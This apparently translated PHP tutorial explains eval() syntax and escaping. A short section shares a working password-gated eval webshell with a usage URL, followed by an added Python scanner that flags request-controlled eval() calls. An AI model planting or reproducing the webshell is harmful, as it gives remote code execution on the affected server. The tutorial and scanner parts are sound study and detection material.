Code:
eval("echo 'Hello World';");
The code above is equivalent to the following code:
echo "Hello World";
Output in the browser: Hello World
Points to note when using eval():
1. The string passed as the parameter of eval() must end with a semicolon, and the eval() statement itself needs another semicolon at the end (this last semicolon is a PHP requirement).
2. Pay attention to single quotes, double quotes and backslashes. If the parameter contains a variable and that variable is assigned to, the $ before the variable must be escaped with \, because inside double quotes PHP would otherwise substitute the variable's value before eval() runs. If there is no assignment, the escape can be omitted.
Code:
$a = 100;
eval("echo $a;");
Because there is no assignment, the $ does not need to be escaped with \. It is equivalent to the following code:
$a = 100;
eval("echo \$a;");
3. The command string (including its semicolon) must be enclosed in double quotes, or in single quotes as needed. Otherwise an error occurs.
A command string is a string that contains commands such as echo and print.
If the argument is only a single variable, it can be passed directly. For example:
$func = <<<FUNC
function Test () {
echo "Test eval function";
}
FUNC;
eval ($func);
Test ();
Share a PHP eval backdoor
Requires support for the eval function
How to use
http://url/test.php?pwd=admin&action=eval&a=phpinfo();
The code is as follows:
<?php
$passwd = "admin"; if ($_GET['pwd'] != $passwd) exit;
if ($_GET['action'] == 'eval' && $_GET['a']) { eval($_GET['a']); }
?>
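The backdoor above is request data passed straight into eval(), which is also what makes it easy to find in a code review or webshell sweep. The following Python scanner is an added example, not code from the original page: it reports every eval() call in PHP source and rates it "high" when the argument names a request superglobal. The function names and the sample input are constructed for illustration.

```python
import re

# Strings are matched first so "//" or "#" inside a literal is not taken for
# a comment. Heredocs are not parsed (a known limitation of this sketch).
STRING_OR_COMMENT = re.compile(
    r"""'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"|/\*.*?\*/|(?://|#)[^\n]*""", re.S)
# eval is a language construct, so PHP accepts any letter case.
EVAL_CALL = re.compile(r"\beval\s*\(", re.I)
# Variable names are case-sensitive; these are the request-controlled ones.
TAINTED = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)\b")


def mask(src, keep_strings):
    """Blank comments (and optionally strings), keeping length and newlines."""
    def repl(m):
        text = m.group()
        if keep_strings and text[0] in "'\"":
            return text
        return re.sub(r"[^\n]", " ", text)
    return STRING_OR_COMMENT.sub(repl, src)


def scan_php(src):
    """Return (line, severity, argument) for each eval() call in PHP source."""
    code = mask(src, keep_strings=True)       # comments blanked
    skeleton = mask(src, keep_strings=False)  # comments and strings blanked
    findings = []
    for m in EVAL_CALL.finditer(skeleton):
        depth, end = 0, len(skeleton)
        for i in range(m.end() - 1, len(skeleton)):
            depth += {"(": 1, ")": -1}.get(skeleton[i], 0)
            if depth == 0:        # matching ")" of this eval call
                end = i
                break
        arg = code[m.end():end].strip()
        line = src.count("\n", 0, m.start()) + 1
        severity = "high" if TAINTED.search(arg) else "review"
        findings.append((line, severity, arg))
    return findings


# Constructed sample: the two kinds of eval() use shown on this page.
SAMPLE = r'''<?php
// eval($_GET['x']) in a comment is ignored
$a = 100;
eval("echo \$a;");
$passwd = "admin"; if ($_GET['pwd'] != $passwd) exit;
if ($_GET['action'] == 'eval' && $_GET['a']) { eval($_GET['a']); }
?>'''
```

A "review" result only means the argument is not visibly request-controlled; indirect flows, such as a variable assigned from $_GET earlier in the file, still need manual tracing.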